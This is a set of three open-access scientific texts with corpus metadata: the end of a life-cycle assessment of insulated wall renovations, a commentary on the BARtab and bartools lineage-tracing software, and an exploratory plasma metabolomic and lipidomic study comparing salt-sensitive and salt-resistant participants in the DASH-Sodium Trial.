If two solutions with similar U-values are compared (but with different thicknesses, since the ICB boards require a greater thickness due to their higher thermal conductivity), the consumption of energy to satisfy the heating and cooling needs is almost the same, but their acquisition costs and the energy and resources necessary for the production of their materials are different. Due to the higher cost of ICB, the EPS solution always presents a lower net present value (NPV).
The 3E-C2C analysis showed that the reference alternatives only perform better in the economic dimension, and only for an energy consumption fulfilling less than 25% of the heating and cooling needs. Therefore, to provide more specific support for decision-making, Tables 6 and 7 present, respectively, the single-leaf and cavity external wall solutions with the best performance (in each dimension and life-cycle stage), without considering the reference walls. When comparing the cavity wall solutions, it was found that solution W9 presents the best environmental performance if energy use for heating and cooling is not considered (Table 7). When taking into consideration the energy used for heating and cooling, the best environmental performance is shown by W14. For energy needs higher than 10%, the most economical solution is WE14.
The research presented in this paper advances the current state of the art by including all the life-cycle stages and dimensions of the LCA in the analysis of solutions for energy renovation of building envelopes. The analysis presented here can be replicated for other solutions for thermal insulation of the building's envelope, or for similar solutions applied in other buildings or weather conditions (namely other countries). Moreover, the conclusions reached show that thermal retrofitting has environmental benefits and that environmentally sustainable materials need to be used more frequently in construction. In fact, the environmental advantage of the latter is already known and proven, but they are still expensive. Therefore, a scale effect on their use could promote a decrease in price, making them more competitive in the construction market; alternatively, public financing of thermal retrofit interventions could include environmental sustainability requirements to reach similar benefits.
Figure 1. Cross-section of an external wall with External Thermal Insulation Composite System (ETICS) with expanded polystyrene (EPS) applied as external rendering and insulation.
Figure 2. Residential flat model used in the study (right).
Notation used in the energy-cost formula (Table 4), expressed in €/(year·m² of external wall): T, cost of 1 kWh of electricity in Portugal for household consumers, without VAT or standing charges (0.139 €/kWh, considering an installation of more than 2.3 kVA (EDP, 2011)); N_ic, nominal annual heating needs per square metre of net floor area of the flat (kWh/(m²·year)); η_i, nominal efficiency of the heating equipment (1, the reference value of RCCTE [30], recently updated by REH [36]); N_vc, nominal annual cooling needs per square metre of net floor area of the flat (kWh/(m²·year)); η_v, nominal efficiency of the cooling equipment (3, the reference value [30]); A_ap, net floor area of the flat under assessment (129.96 m²); A_ew, total area of the external wall being assessed (40.27 m²).
Figure 3. C2C Global Warming Potential (GWP, in kg CO2 eq, without energy for heating and cooling)/m² of the external wall alternatives with ICB.
Figure 4. C2C consumption of nonrenewable primary energy (PE-NRe, in MJ, without energy for heating and cooling)/m² of the external wall alternatives with ICB.
Figure 6. Difference between the NPV/m² of external wall of the economic (A1-A5, B2-B4, C2-C4, and D stages) and energy (B6 substage) costs of each external wall alternative and the NPV/m² of W1, considering different consumption patterns for the use stage (guaranteeing 10%, 35%, or 50% of the energy needs) of ETICS with ICB.
Figure 7. C2C Global Warming Potential (GWP, in kg CO2 eq, without energy for heating and cooling)/m² of the external wall alternatives of ETICS with ICB and EPS.
Figure 8. C2C consumption of non-renewable primary energy (PE-NRe, in MJ, without energy for heating and cooling)/m² of the external wall alternatives of ETICS with ICB and EPS.
Figure 10. Difference between the NPV/m² of external wall of the economic (A1-A5, B2-B4, C2-C4, and D stages) and energy (B6 substage) costs of each external wall alternative and the NPV/m² of W1, considering different consumption patterns for the use stage (guaranteeing 10%, 25%, 35%, or 50% of the energy needs) of ETICS with ICB and EPS.
Figure 11 is similar to Figure 10, but only includes the external wall alternatives that were renovated by the application of ETICS, and also indicates their corresponding U-values. This chart helps the decision-maker choose the best energy renovation alternative from a C2C economic point of view, depending on the desired U-value and energy consumption and on the available budget.
Figure 11. Difference between the NPV of the economic (A1-A5, B2-B4, C2-C4, and D stages) and energy (B6 substage) costs of each renovated external wall alternative and the NPV of W1, considering different consumption patterns for the use stage (guaranteeing 10%, 25%, 35%, or 50% of the energy needs) and the corresponding U-values.
Table 1. Designation, thickness, and thermal performance (U-value) of the ETICS applied.
Table 2. Maintenance, replacement, and repair operations of the external cladding and internal coatings of the external wall solutions evaluated.
Table 3. Life-cycle stages of buildings and building materials based on European standards (CEN, 2012a).
Table 5. Designation, thickness, and type of insulation board in the ETICS applied, and thermal performance (U-value) of the wall after rehabilitation.
Table 6. Single-leaf external wall solution with the best performance, without considering the reference wall (the colour of each row depends on the best performing solution for each indicator: brown for ICB and blue for EPS).
Table 7. Cavity wall solution with the best performance, without considering the reference wall (the colour of each row depends on the best performing solution for each indicator: brown for ICB and blue for EPS).
Author contributions: Data curation, J.D.S.; Methodology, J.D.S.; Validation, A.M.P.C. and J.J.B.C.S.; Writing-original draft, J.D.S.; Writing-review & editing, A.M.P.C., J.J.B.C.S., J.M.C.L.d.B. and M.D.P. | 2019-04-12T07:59:43.959Z | 2019-03-27T00:00:00.000 | {
"year": 2019,
"sha1": "7e23f828d0e642de15efbbd9fd28e768e199201f",
"oa_license": "CCBY",
"oa_url": "https://www.mdpi.com/2076-3417/9/7/1285/pdf?version=1553856226",
"oa_status": "GOLD",
"pdf_src": "ScienceParseMerged",
"pdf_hash": "7e23f828d0e642de15efbbd9fd28e768e199201f",
"s2fieldsofstudy": [
"Engineering"
],
"extfieldsofstudy": [
"Engineering"
]
} |
269771460 | pes2o/s2orc | v3-fos-license | A computational tool suite to facilitate single-cell lineage tracing analyses
Tracking the lineage relationships of cell populations is of increasing interest in diverse biological contexts. In this issue of Cell Reports Methods, Holze et al. present a suite of computational tools to facilitate such analyses and encourage their broader application.
Distinguishing how shared inheritance shapes cellular phenotypes is a central question in developmental biology, cancer heterogeneity, immunity, and many other biological fields. A powerful example of the utility of such lineage tracing experiments is the mapping of the developmental fate of every cell in the Caenorhabditis elegans embryo by direct observation via light microscopy.1 While classic techniques for lineage tracing, e.g., via Cre-mediated reporter expression or T cell receptor or B cell receptor diversification in lymphocytes, have been used for decades, recent years have seen an explosion in new approaches.2,3 These newer approaches include the use of "endogenous" barcodes generated by somatic mutations in nuclear and mitochondrial genomes as well as a wide variety of exogenous barcoding methods leveraging different genetic engineering approaches such as CRISPR-Cas9, lentiviruses, terminal deoxynucleotidyl transferase (TdT), RAG 1 and 2 enzymes, and more. Importantly, these exogenous barcoding technologies work both in human cell culture/ex vivo systems as well as in situ for a variety of model organisms, including mouse and zebrafish.
Coupled with simultaneous high-throughput molecular phenotyping of the cells, such as through single-cell RNA sequencing (scRNA-seq), these techniques are powerful molecular "microscopes" that can link the current state of a cell with its ancestral history.3 However, the introduction of PCR and sequencing errors and the unique aspects of each system pose substantial technical challenges for their analysis.4 Currently, researchers interested in adding lineage information to their favorite model system have no shortage of experimental protocols to choose from; however, there is a comparative lack of broadly applicable, flexible analysis tools capable of analyzing data from diverse protocols.4 Publishing in Cell Reports Methods, Holze et al.5 have developed a tool suite that complements existing tools6-9 and could greatly enhance the widespread adoption of such techniques by non-specialist teams. It also helps to address the crucial need for clearer guidelines and standardized metrics to evaluate new datasets, improving the overall reproducibility of single-cell lineage tracing results.4 The BARtab and bartools analysis suite reported by Holze et al.5 is a significant step forward in simplifying single-cell lineage tracing analysis for a broad community. Implemented as a Nextflow pipeline and an R package, respectively, these tools allow flexible analyses of diverse barcoding approaches with a particular focus on quality control, barcode identification and quantification, and multiple plotting options, as well as statistical evaluation of barcode composition and diversity (Figure 1). The first tool, BARtab, is dedicated to the early processing steps of fastq or bam files to identify and quantify barcodes. This can be applied both to bulk sequencing protocols as well as to single-cell protocols. Together with the CellBarcode R tool recently released,6 these are the first tools incorporating single-cell input from a diversity of wet lab protocols with high flexibility in both the design and lengths of the barcodes. Therefore, they could be broadly taken up by the community for standard analyses of diverse experimental approaches.
The second package, bartools, is dedicated to the further analysis of quantified barcode abundance estimates and can import both the BARtab output as well as results from other software packages in simple csv format. bartools focuses specifically on barcode normalization, visualization, and evaluation of barcode composition and diversity, alongside basic statistical testing. The introduction of intuitive visualization techniques and accompanying statistics greatly aids exploratory analysis of such large datasets and rapid QC evaluation of new experiments. For non-specialist teams, this will enable the incorporation of such approaches into their experimental toolbox. bartools does require the user to be familiar with the R environment, while other tools have provided Rshiny apps for even easier access.8,9 The authors describe extensive testing against previously published datasets, both from their own lab as well as others. This includes not only barcode assays performed by bulk sequencing and scRNA-seq but also spatial transcriptomics, demonstrating the most up-to-date range of utility.
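To make the division of labour concrete, the following generic Python sketch (it is not the BARtab/bartools API; the read layout, barcode coordinates, and reads are invented) mimics the core steps such tools automate: pull a fixed-position barcode out of each read, tally barcode abundances, and summarise composition with a Shannon diversity index.

```python
# Generic illustration of barcode identification, quantification, and
# diversity summarisation. All inputs are invented for the example.
import math
from collections import Counter

BARCODE_START, BARCODE_LEN = 4, 8  # hypothetical construct layout

reads = [
    "ACGTAAAAAAAACGT",
    "ACGTAAAAAAAACGT",
    "ACGTCCCCCCCCCGT",
]

# Extract the barcode substring from each read and count occurrences.
counts = Counter(read[BARCODE_START:BARCODE_START + BARCODE_LEN]
                 for read in reads)

# Shannon diversity of the barcode composition.
total = sum(counts.values())
shannon = -sum((n / total) * math.log(n / total) for n in counts.values())

for bc, n in counts.most_common():
    print(f"{bc}: {n} reads ({n / total:.0%})")
print(f"Shannon diversity: {shannon:.3f}")
```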
The field faces upcoming challenges in providing guidelines on how to distinguish barcodes from noise and provide accurate barcode identification and quantification [4]. It is easy to generate "normal looking" data that are in fact polluted by technical artifacts such as PCR or sequencing errors. Simulation tools incorporated into analysis suites have already started to address such issues [6], but more diverse barcode designs as well as biological and technical parameters need to be added. Additionally, such tools need to be extended to incorporate evolvable barcodes, which introduce added complexity to the analysis [7]. While evolvable barcodes have their own diversity of designs, incorporating them would provide a truly flexible suite of tools for all single-cell lineage analysis. Finally, maintaining and updating existing tools over time is often a challenge in academia. The successful examples of Seurat and scanpy for scRNA-seq analyses should guide the field.
Figure 1. Schematic of BARtab and bartools applications. Cell lineage can be determined by multiple experimental barcoding protocols (left). BARtab and bartools, published by Holze et al. [5] in this issue of Cell Reports Methods, provide flexible, broadly applicable computational analysis tools that can analyze diverse barcoding experimental protocols, providing quality control assessment, diverse visualization tools, and statistical testing. Figure created using BioRender.com. | 2024-05-16T06:17:54.866Z | 2024-05-01T00:00:00.000 | {
"year": 2024,
"sha1": "480e68120616931ed0d59d70fab3f848a24b51b6",
"oa_license": "CCBY",
"oa_url": "http://www.cell.com/article/S2667237524001243/pdf",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "f30ea379bcd3683bb323c4272314282571ea5bd2",
"s2fieldsofstudy": [
"Computer Science",
"Biology"
],
"extfieldsofstudy": [
"Medicine"
]
} |
234767844 | pes2o/s2orc | v3-fos-license | An exploratory analysis of comparative plasma metabolomic and lipidomic profiling in salt-sensitive and salt-resistant individuals from The Dietary Approaches to Stop Hypertension Sodium Trial
Objective: This study conducted exploratory metabolomic and lipidomic profiling of plasma samples from the DASH (Dietary Approaches to Stop Hypertension) Sodium Trial to identify unique plasma biomarkers that distinguish salt-sensitive from salt-resistant participants. Methods: Utilizing plasma samples from the DASH-Sodium Trial, we conducted untargeted metabolomic and lipidomic profiling on plasma from salt-sensitive and salt-resistant DASH-Sodium Trial participants. Study 1 analyzed plasma from 106 salt-sensitive and 85 salt-resistant participants obtained during screening when participants consumed their regular diet. Study 2 examined paired within-participant plasma samples in 20 salt-sensitive and 20 salt-resistant participants during a high-salt and low-salt dietary intervention. To investigate differences in metabolites or lipidomes that could discriminate between salt-sensitive and salt-resistant participants, or the response to a dietary sodium intervention, Principal Component Analysis and Orthogonal Partial Least Squares Discriminant Analysis were conducted. Differential expression analysis was performed to validate the observed variance and to determine statistical significance. Results: Differential expression analysis between salt-sensitive and salt-resistant participants at screening revealed no difference in plasma metabolites or lipidomes. In contrast, three annotated plasma metabolites, tocopherol alpha, 2-ketoisocaproic acid, and citramalic acid, differed significantly between high-sodium and low-sodium dietary interventions in salt-sensitive participants. Conclusion: In DASH-Sodium Trial participants on a regular diet, plasma metabolomic and lipidomic signatures did not differ between salt-sensitive and salt-resistant participants. High-sodium intake was associated with changes in specific circulating metabolites in salt-sensitive participants. Further studies are needed to validate the identified metabolites as potential biomarkers associated with the salt sensitivity of blood pressure.
INTRODUCTION
Hypertension is a critical global health issue that is associated with concomitant increases in cardiovascular and renal disease and morbidity. According to the 2017 American Heart Association (AHA) guidelines, the prevalence of hypertension among United States adults is 46% [1]. Several clinical studies have presented strong evidence that excess dietary salt causes an increase in blood pressure (BP) that fosters an increased risk of premature cardiovascular morbidity and mortality [2][3][4][5][6][7][8]. Although the BP responses to salt modestly affect the population as a whole, some individuals exhibit an exaggerated BP response to salt intake and are characterized as salt-sensitive individuals. Salt-sensitive hypertension occurs in approximately 50% of hypertensive patients, and salt-sensitive individuals are at an increased risk of adverse cardiovascular outcomes [7]. Despite the increasing evidence of adverse effects of excess dietary salt, 90% of United States adults consume dietary sodium in excess of the AHA recommended level of less than 2300 mg/day for most adults and the target intake of 1500 mg/day recommended for hypertensive individuals [9]. Thus, identifying individuals that are salt-sensitive is critical. Currently, the only method of identifying salt-sensitive individuals is monitoring the BP changes with a carefully performed, time-consuming dietary protocol that is not feasible for large-scale clinical diagnosis [10]. Therefore, there remains a critical need to identify alternative approaches to determine the salt sensitivity of BP.
Genetic, lifestyle, and environmental factors may influence the development of salt sensitivity. However, the exact underlying physiological and metabolic factors that drive the salt sensitivity of BP are not known. The profiling of biological analytes, including metabolites (metabolomics) and lipids (lipidomics), offers a unique approach to measure physiological and biochemical effects associated with a disease state [11,12]. Metabolomics and lipidomics have been increasingly used to identify disease biomarkers for cardiovascular diseases, including hypertension [13][14][15][16]. Thus, studying plasma metabolomic and lipidomic profiling in salt-sensitive individuals may help establish unique biomarkers to determine the salt sensitivity of BP.
In this study, we conducted exploratory untargeted plasma metabolomic and lipidomic profiling on salt-sensitive and salt-resistant participants from the Dietary Approaches to Stop Hypertension Sodium (DASH-Sodium) Trial. The DASH-Sodium clinical trial examined the impact of dietary sodium on BP in individuals via a control diet, which models typical American consumption, or the DASH diet, both delivered at high, intermediate, and low levels of sodium [17,18]. This carefully monitored dietary trial provided the opportunity to identify salt-sensitive versus salt-resistant individuals by their BP response to a dietary sodium intervention. The novelty of our current study is that we examined plasma metabolic and lipidomic traits among salt-sensitive and salt-resistant participants at screening when maintained on their regular diet (i.e. prior to a dietary intervention) and, in a subset of participants, their response to dietary salt intervention on the DASH control diet. Our primary hypothesis was that salt-sensitive participants would exhibit altered metabolic and lipidomic profiles at baseline screening on their regular diet. Our secondary hypothesis was that any differences in the metabolic and lipidomic profile between salt-sensitive and salt-resistant participants would be exaggerated by a high-sodium diet.
METHODS
The DASH-Sodium Trial, a multicenter randomized controlled trial sponsored by the National Heart, Lung and Blood Institute (NHLBI), was conducted to test the effects of dietary sodium on blood pressure. The details of the DASH-Sodium Trial (ClinicalTrials.gov Identifier NCT00000608; Clinical Trial Registry https://clinicaltrials.gov/ct2/show/NCT00000608) study design have been previously described in detail [17]. In brief, the trial was conducted in 412 healthy adult individuals aged 22 years or older with an SBP of 120-159 mmHg and a DBP of 80-95 mmHg (ranging from normal to Stage 1 hypertension). After a screening phase (during which participants were consuming their regular diet) and a 2-week run-in period, using a parallel study design, participants were randomized to receive a control diet representing a typical American diet or a DASH diet rich in fruits, vegetables, and low-fat dairy food. Using a crossover design, the participants in each dietary arm (control or DASH) were further randomized to receive three different sodium levels for 30 days each: low (50 mmol/day, the optimal recommended daily intake), intermediate (100 mmol/day, the upper limit of currently recommended sodium levels), or high (150 mmol/day, the current typical US sodium intake).
Twenty-four-hour ambulatory blood pressure recordings and overnight fasted plasma samples were obtained during the screening period, when participants were consuming their regular diet, and during the last week of each dietary sodium intake period. The NHLBI Biologic Specimen and Data Repository Information Coordinating Center (BioLINCC) approved our request to obtain stored plasma samples from the DASH-Sodium Trial. In the DASH-Sodium Trial, participants who exhibited an SBP increase of 5 mmHg or higher on the high-salt diet compared with the SBP value recorded on a low-salt intake were classified as salt-sensitive, whereas participants with less than a 5 mmHg change in SBP between the high-salt and low-salt diets were considered salt-resistant. To characterize the metabolomic and lipidomic responses, we used plasma samples collected at the time of screening from patients consuming their standard daily intake (referred to as baseline) from 106 salt-sensitive and 85 salt-resistant participants (total 191 participants) who were subsequently assigned to a control diet in the DASH-Sodium low-salt or high-salt intervention. This represents the total number of participants randomly assigned to the control diet in DASH-Sodium for whom plasma samples were available at screening and during the low-salt and high-salt interventions. Additionally, to address our secondary hypothesis, in a subset of these participants (20 salt-sensitive and 20 salt-resistant) randomly selected from the pool of 106 salt-sensitive and 85 salt-resistant participants, plasma samples from within the same participants during both a high-salt and a low-salt dietary intervention, while participants were maintained on a control diet, were also examined. An untargeted metabolic and lipidomic screen of plasma samples was performed by the West Coast Metabolomics Center at UC Davis (http://metabolomics.ucdavis.edu/) as described below. Raw data files are stored at the NIH metabolomics database (www.metabolomicsworkbench.org) and KEGG identifiers were obtained from the community database KEGG LIGAND DB.

Results were exported to a data server with absolute spectra intensities and further processed by the BinBase filtering algorithm (rtx5) with the following settings: validity of chromatogram (<10 peaks with intensity >10^7 counts/s), unbiased retention index marker detection (MS similarity >800, validity of the intensity range for high m/z marker ions), and retention index calculation by fifth-order polynomial regression. Spectra were cut to 5% base peak abundance and matched to database entries from most to least abundant using the following matching filters: retention index window ±2,000 units (equivalent to about ±2 s retention time), validation of unique ions and apex masses (based on unique ion inclusion in apexing masses and presence at >3% of base peak abundance), mass spectrum similarity fit criteria dependent on peak purity and signal/noise ratios, and a final isomer filter. Quantification was reported as peak height (m/z value) using the unique ion as default at a specific retention index. A quantification report table was produced for all database entries positively detected in more than 10% of the samples of a study design class (as defined in the miniX database) for unidentified metabolites.
Metabolomic data normalization and quality control
Data were normalized by vector normalization, in which the sum of all peak heights for all identified metabolites in each sample was calculated and termed 'mTIC'. Subsequently, significant differences between the treatment groups' or cohorts' mTIC averages were determined. If these averages differed at P less than 0.05, the data were normalized to each group's average mTIC. If the averages between treatment groups or cohorts did not differ, the data were normalized to the total average mTIC. Blanks were run as negative quality controls to evaluate contamination and background noise. Additionally, a quality control sample of National Institute of Standards and Technology standard plasma was run after every 11th sample injection.
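As an illustration, the mTIC procedure described above can be sketched as follows. This is a hypothetical Python reimplementation, not the pipeline the authors used, and the choice of t-test/ANOVA for comparing group averages is our assumption, since the text does not name the statistical test:

```python
import numpy as np
from scipy import stats

def mtic_normalize(peaks, groups, alpha=0.05):
    """Vector ('mTIC') normalization as described above (illustrative sketch).

    peaks  : (n_samples, n_metabolites) array of peak heights
    groups : (n_samples,) array of group/cohort labels
    """
    mtic = peaks.sum(axis=1)                     # per-sample sum of peak heights
    labels = np.unique(groups)
    samples = [mtic[groups == g] for g in labels]
    # The text does not name the test; t-test/ANOVA is our assumption.
    _, p = stats.ttest_ind(*samples) if len(labels) == 2 else stats.f_oneway(*samples)
    if p < alpha:                                # group averages differ
        target = np.array([mtic[groups == g].mean() for g in groups])
    else:                                        # use the total average mTIC
        target = np.full(len(mtic), mtic.mean())
    return peaks * (target / mtic)[:, None]
```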
Lipidomic profiling
Sample extraction
A 20 µl aliquot of each sample was added to 975 µl of premixed, ice-cold, N2-purged 3:10 MeOH (methanol):MTBE (methyl tertiary-butyl ether) and quality control mix [22:1 CE (cholesteryl ester)] and 188 µl of LC-MS grade water and gently shaken for 6 min at 4 °C. Following centrifugation (2 min at 14,000 g), the upper organic phase was divided into two 350 µl aliquots and the bottom aqueous phase was divided into two 110 µl aliquots; one aliquot from each phase was dried down by centrivap. The upper phase was reconstituted in 110 µl of a MeOH/toluene (9:1) mixture containing the internal standard 12-[[(cyclohexylamino)carbonyl]amino]-dodecanoic acid (CUDA) at 50 ng/ml. The lower phase was reconstituted in 100 µl of acetonitrile:H2O (80:20).
Data acquisition
Charged surface hybrid analysis
Extracts were separated using a charged surface hybrid (CSH) C18 column (Waters). For ESI (electrospray ionization) positive mode, mobile phase A constituted 60:40 acetonitrile:water with 10 mmol/l ammonium formate and 0.1% formic acid. Mobile phase B constituted 90:10 isopropanol:acetonitrile with 10 mmol/l ammonium formate and 0.1% formic acid, at a flow rate of 0.6 ml/min. For ESI negative mode, the composition of the mobile phases was identical, but 10 mmol/l ammonium acetate was used in place of ammonium formate. The quadrupole/time-of-flight (QTOF) mass spectrometers were operated with ESI performing a full scan in positive mode (Agilent 6530) and negative mode (Agilent 6550).
Data processing and quality control
Data processing was done using MS-DIAL [20], followed by blank subtraction in Microsoft Excel and data cleanup using MS-FLO [21]. Peaks were annotated by manual comparison of MS/MS spectra and accurate masses of the precursor ions to spectra in the Fiehn laboratory's LipidBlast spectral library [22]. Blanks were run as negative quality controls to evaluate both contamination and background noise, and CUDA was used as an internal standard in all samples. Additionally, a quality control sample of National Institute of Standards and Technology (NIST) standard plasma was run after every 11th sample injection.
Data
The metabolomics and lipidomics data obtained from the UC Davis West Coast Metabolomics core were provided to GeneVia Technologies for analysis. For the metabolomics data, normalization was applied as described above. However, for the lipidomics data, since no normalization had previously been applied and no internal standards were used for quantification in the untargeted analysis, the data were assessed raw and with two different normalization methods: quantile normalization and Systematic Error Removal using Random Forest (SERRF) normalization [23].
Quality control
Principal component analyses (PCA) were performed on the data following log2 transformation, and the results were visualized using the R packages ggfortify [24] and ggplot2 [25], with samples colored according to group. Separate PCAs were carried out on the raw data as well as on the two different normalization methods for the lipidomics data. Additional PCA plots were also produced, coloring the samples according to race and sex, to investigate any potential relationships. Orthogonal Partial Least Squares Discriminant Analysis (OPLS-DA) was also performed as a secondary control indicator on the dataset, using the MetaboAnalystR R package [26].
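The PCA quality-control step above was performed in R (ggfortify/ggplot2); purely for illustration, an equivalent sketch in Python might look like the following, where the function name and the +1 pseudo-count are our assumptions:

```python
import numpy as np
from sklearn.decomposition import PCA

def pca_qc(intensities):
    """QC sketch: PCA on log2-transformed intensities, mirroring the R workflow."""
    X = np.log2(intensities + 1.0)   # +1 pseudo-count guards against log2(0) (our choice)
    scores = PCA(n_components=2).fit_transform(X)  # PCA centers the data internally
    return scores  # plot PC1 vs PC2, coloring samples by group, race, or sex
```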
Differential expression analysis
The metabolite and lipidome profiles were compared between sample groups: salt-sensitive versus salt-resistant individuals, salt-sensitive high-salt diet versus salt-sensitive low-salt diet, salt-resistant high-salt diet versus salt-resistant low-salt diet, salt-sensitive high-salt diet versus salt-resistant high-salt diet, and salt-sensitive low-salt diet versus salt-resistant low-salt diet. Statistical testing between sample groups was performed with limma [27] using log-transformed data. Adjusted P values were calculated by correcting for multiple testing using the Benjamini-Hochberg method with a false discovery rate of 0.05 [28]. Results were obtained both unfiltered and filtered for high-salt diet versus low-salt diet in the salt-sensitive and salt-resistant groups, and unfiltered for salt-sensitive versus salt-resistant groups, with metabolites presenting an adjusted P value less than 0.05 and an absolute log2 fold change greater than 1 considered differentially expressed. Further analysis was carried out using the MetaboAnalystR R package [26] for the salt-sensitive versus salt-resistant groups. Due to the consistent results obtained with limma, the remaining analyses were performed using limma alone.
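The actual testing was done with limma in R; the multiple-testing step alone can be illustrated in Python with statsmodels, applying the paper's cut-offs (adjusted P < 0.05 and |log2 fold change| > 1). The function name is ours:

```python
import numpy as np
from statsmodels.stats.multitest import multipletests

def call_differential(pvals, log2fc, fdr=0.05, lfc_cut=1.0):
    """Benjamini-Hochberg correction plus the paper's differential-expression
    cut-offs (adjusted P < 0.05 and absolute log2 fold change > 1)."""
    reject, p_adj, _, _ = multipletests(pvals, alpha=fdr, method="fdr_bh")
    return reject & (np.abs(log2fc) > lfc_cut), p_adj
```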
Participant demographics
We analyzed fasted plasma samples from 191 DASH-Sodium Trial participants for untargeted metabolomic and lipidomic profiling. The demographic characteristics of these participants are summarized in Table 1. Overall, there was an equivalent distribution of men and women in both the salt-resistant and salt-sensitive groups. While the distribution of ethnic backgrounds among men was generally similar across the salt-sensitive and salt-resistant groups, the number of African-American women in the salt-sensitive group was higher than in the salt-resistant group. The demographic characteristics for education and income were largely similar across the salt-sensitive and salt-resistant groups.
Metabolomic baseline plasma profiling of salt-sensitive versus salt-resistant participants
PCA showed no difference in the metabolomics profile between salt-sensitive and salt-resistant participants at baseline consuming their standard daily intake. Further evaluation via PCA for independent groups constituted by sex and race also showed no difference in metabolites between salt-sensitive and salt-resistant participants (Supplementary Figures 1, http://links.lww.com/HJH/B670 and 2, http://links.lww.com/HJH/B670, respectively). Orthogonal Partial Least Squares Discriminant Analysis (OPLS-DA) showed no significant difference between the salt-sensitive and salt-resistant groups (Fig. 1).
The differential expression analysis on the comparison between salt-sensitive and salt-resistant participants (Fig. 2) likewise revealed no differentially expressed metabolites.

Metabolomic profiling comparing the responses to a high-salt versus low-salt diet between salt-sensitive and salt-resistant participants
The differential expression analysis of the metabolomic profile in the high-salt versus low-salt dietary intervention in salt-sensitive participants maintained on a control diet showed a significant difference (adjusted P value <0.05 and absolute log2 fold change >1) in three annotated metabolites, tocopherol alpha, 2-ketoisocaproic acid, and citramalic acid (Fig. 3 and Table 2), and in two non-annotated metabolites labeled 210343 and 390144 (Supplementary Table 4, http://links.lww.com/HJH/B670). In the salt-sensitive group, the high-salt dietary intervention was associated with a significant increase in citramalic acid levels and significant decreases in the levels of tocopherol alpha, 2-ketoisocaproic acid, 210343, and 390144. The comparative differential expression analysis in salt-resistant participants yielded no significant effect of alterations in dietary salt intake on the metabolomic profile.
Lipidomic profiling to compare salt-sensitive versus salt-resistant participants
Lipidomics OPLS-DA showed no difference in the baseline lipid profile between salt-sensitive and salt-resistant participants consuming their regular diet (Fig. 4). Additionally, the lipid differential expression analysis yielded no differences among the plasma lipidomes between salt-sensitive and salt-resistant groups at baseline (Supplementary Table 5, http://links.lww.com/HJH/B670).
DISCUSSION
The salt sensitivity of BP is strongly linked to hypertension risk [2][3][4][5][6][7][8]. Clinical identification of the salt sensitivity of BP was conducted in the DASH-Sodium Trial. Utilizing plasma samples from the DASH-Sodium Trial, we employed untargeted metabolomic and lipidomic techniques with the goal of identifying potential biomarkers of the salt sensitivity of BP. At the time of screening in the DASH-Sodium Trial, when participants were consuming their standard daily intake, we observed no difference among annotated metabolites or lipidomes between salt-sensitive and salt-resistant participants. However, sub-group analysis of plasma metabolites in salt-sensitive participants maintained on a control diet, in which only the dietary sodium content was modified and all remaining dietary components were unaltered, revealed that a high-salt dietary intervention decreased the levels of alpha-tocopherol and 2-ketoisocaproic acid and increased the level of citramalic acid. Alpha-tocopherol, the predominant form of vitamin E in humans, is a lipid-soluble antioxidant [29,30]. Significantly, alpha-tocopherol supplementation in Dahl salt-sensitive (DSS) rats maintained on a high-salt diet (8% NaCl) prevented the development of salt-sensitive hypertension [31]. Given our observation of a reduction in the level of alpha-tocopherol during a high-salt dietary intervention in the salt-sensitive sub-group, we speculate that reduced alpha-tocopherol levels may contribute to the salt sensitivity of blood pressure in human participants, and that increased dietary intake of vitamin E may potentially reduce the salt sensitivity of blood pressure. 2-Ketoisocaproic acid, a leucine metabolite, suppresses skeletal muscle insulin-mediated glucose transport and is associated with insulin resistance [32,33], which is linked to the salt sensitivity of BP [34,35]. In our study, a high-salt diet in salt-sensitive participants was associated with a decrease in 2-ketoisocaproic acid levels. However, as diabetes was an exclusion criterion for DASH-Sodium Trial participants, we were unable to examine a potential association between 2-ketoisocaproic acid and diabetes in salt-sensitive participants in our analysis. In our study, elevated levels of citramalic acid were observed following high-salt intake in salt-sensitive individuals. Increased levels of citramalic acid have been linked with obesity [36], suggesting a possible association between obesity and the salt sensitivity of BP. Consequently, the association of citramalic acid with high-salt intake in salt-sensitive individuals warrants further investigation.
Prior targeted plasma metabolic phenotyping of the DASH-Sodium Trial reported that a low-salt intervention was associated with increased levels of metabolites involved in methionine metabolism and tryptophan, and decreased levels of the short-chain fatty acid isovalerate and of gamma-glutamyl amino acids [37]. The altered metabolomic profile observed between our study and prior analyses may be attributed to our untargeted approach, the inclusion of plasma samples from only a small subset of participants with high-salt to low-salt intervention from the control diet group only, and analytical separation into salt-sensitive and salt-resistant groups. Additionally, a double-blind crossover study in middle-aged adults with elevated BP that examined urinary metabolite changes in response to dietary sodium restriction reported increases in succinate, methionine sulfoxide, S-adenosylhomocysteine, D-gluconate, and asparagine [38]. In our study, changes in these metabolites were not observed, which may be attributed to the difference between urinary and plasma metabolites. These studies highlight the importance of considering sample type and comorbidities whenever conducting metabolomic and lipidomic analyses. Hypertension, irrespective of the salt sensitivity of BP, has been linked to alterations in metabolomic and lipidomic profiles [13][14][15][16]. A plasma metabolomics study comparing young hypertensive and normotensive groups observed differences in the levels of glycine, lysine, and cysteine [39]. In contrast, the urinary metabolite analysis from the INTERMAP study revealed a positive association of alanine and an inverse association of hippurate, formate, and N-methylnicotinate with increased BP [40]. A lipidomic study conducted in hypertensive and normotensive men reported reduced levels of ether phosphatidylcholines and phosphatidylethanolamines with hypertension [41]. In contrast, lipidomic profiling in treated and untreated hypertensive patients showed increased levels of several triacylglycerol species in hypertension that were reduced in response to antihypertensive drugs [42]. The absence of an altered lipidomic profile between salt-sensitive and salt-resistant participants in the current untargeted exploratory analysis is supported by the prior finding of the DASH-Sodium Trial that changes in dietary sodium intake over the range of 50-150 mmol/day did not affect blood lipid concentrations [43].

Table 2. Major annotated plasma metabolite classes featuring significant changes associated with the high-salt dietary intervention relative to the low-salt dietary intervention in salt-sensitive individuals (n = 20) from the DASH-Sodium Trial maintained on a control diet. The results are based on the differential expression analysis with cut-offs of adjusted P value less than 0.05 and absolute log2 fold change greater than 1. KEGG, Kyoto Encyclopedia of Genes and Genomes; log FC, log fold change; P values calculated per individual comparison; adjusted P values corrected for multiple testing by the Benjamini-Hochberg procedure.
The current study has several strengths: the DASH-Sodium Trial was a carefully conducted controlled feeding study with a crossover design for the dietary sodium intervention that allowed participants to serve as their own controls; our current analysis included a sub-group analysis of plasma samples from participants who were on the control diet, which is representative of a typical American diet; and the salt-sensitive and salt-resistant groups were pre-identified based on the SBP changes observed with the high-salt to low-salt diet intervention at the end of the DASH-Sodium Trial.
